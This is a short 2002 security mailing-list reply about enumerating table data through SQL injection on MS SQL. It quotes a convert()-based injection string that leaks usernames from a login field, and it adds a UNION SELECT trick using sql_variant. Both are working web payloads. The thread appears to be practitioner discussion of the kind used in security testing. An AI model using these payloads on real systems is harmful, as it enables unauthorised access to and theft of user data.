Re: sql table data enumeration help please.

["Deus, Attonbitus" <Thor () HammerofGod com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 10:38 PM 5/9/2002, Kevin Spett wrote:

> SELECT column must have the same data type.  Try using the convert() hack to
> get around this whole issue, like this:
>
> username=invalidusername' + convert(int, (SELECT TOP 1 UserName FROM
> tblUsers WHERE Username > 'a')) + ''--

On a side note, MS SQL introduced the 'variant' datatype which will keep 
you from having to determine the actual column datatype by converting it 
for you as in:
'Union select convert(sql_variant,1),...' instead of 'union select 1,1,1,1...)

Saves time for those in a hurry ;)

AD




-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPNv0G4hsmyD15h5gEQKZUQCg3gRzSKlqAOxVq7YYJ0bjESAaFDkAoLn0
8d8FuEPvTaC+7hXnDh/kAYPw
=e28e
-----END PGP SIGNATURE-----


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/